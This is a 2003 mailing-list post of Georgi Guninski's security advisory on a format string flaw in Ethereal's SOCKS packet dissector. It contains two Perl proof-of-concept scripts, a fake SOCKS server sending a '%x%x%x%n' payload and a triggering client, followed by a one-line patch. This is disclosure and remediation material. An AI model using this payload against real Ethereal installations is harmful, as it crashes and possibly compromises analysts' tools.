Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

Etnereal Advisory (Guninski #60)

From: Steve <steve () vulnwatch org>
Date: Sat, 8 Mar 2003 16:20:44 +0000 (GMT)
Georgi Guninski released an advisory this morning on Ethereal.  Here are
the important parts of that advisory;

Steve Manzuik
Moderator - VulnWatch

================================================

Description:
Ethereal is a sniffer. According to www.ethereal.com its purpose is:
"Sniffing the glue that holds the Internet together"
There is format string bug in it which is confirmed to be a DoS and
probably can lead to execution of code (the difficulty comes from the fact
that some characters are escaped)

Details:
The problem seems to be in: "packet-socks.c" line 910 of 1180
-----
    proto_tree_add_text( tree, tvb, offset, linelen,
                                     format_text(data, linelen));
------
The format mask is missing.
How to reproduce on localhost:

start raw3sv.pl (dummy socks server, attached)
start ethereal on loopback, update packets in real time.
start sockcl.pl (attached, does socks ping, without argument connects to
localhost)
wait about 5 seconds.
go to ethereal and select the line "Sock5.....Ping Req Results"
result: SEGV.

---raw3sv.pl----


#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
use str1ct;
#local port
my $port = 1080;

#redirect to

my $msg="\x05\x00";
my $repl="\x05\x00\x00\x00\x02aa";

my $pi="m\$sux\%x\%x\%x\%n";


my $server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";

print "Dummy socks server for ethereal\nListening on localhost:${port}\n";

my $client;
while ($client = $server->accept()) {
 print "Client connected.\n";
 print "Sending...";
 sleep(1);
#    while(<$client>) {print $_;}
 print $client "$msg";
 print "OK\n";
 sleep(1);
 print $client "$repl";
 sleep(1);
 print $client "$pi";
 close($client);
 exit(0);
}

----------------

----sockcl.pl------------

#!/usr/bin/perl -w
# Written by Georgi Guninski
use IO::Socket;
use str1ct;
my $host= $ARGV[0] || "localhost";
my $port=1080;

print "host=${host}\n";

my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP") || die("Unable to connect");

print "Start\n";

my $logcmd="\x05\x00\x00";
my $pingcmd="\x05\x80\x00\x01\x01\x01\x01\x01\x01\x01";

print $socket $logcmd;
my $x;
sysread($socket,$x,2);
#sleep(1);
print $socket $pingcmd;
sleep(5);

print "Done\n";

----------------


Workaround/Solution:
Upgrade to 0.9.10 or apply the following patch:
------------------
--- packet-socks.c.orig    2002-08-29 03:40:03.000000000 +0300
+++ packet-socks.c    2003-02-25 15:52:14.000000000 +0200
@@ -908,7 +908,7 @@
                          linelen = lineend - data;

                                 proto_tree_add_text( tree, tvb, offset,
linelen,
-                                   format_text(data, linelen));
+                                   "%s",format_text(data, linelen));
                                 offset += linelen;
                                 data = lineend;
                             }
------------------

Vendor status:
Notified on Tue, 25 Feb 2003
http://www.ethereal.com/appnotes/enpa-sa-00008.html
Previous By Date Next
Previous By Thread Next

Current thread: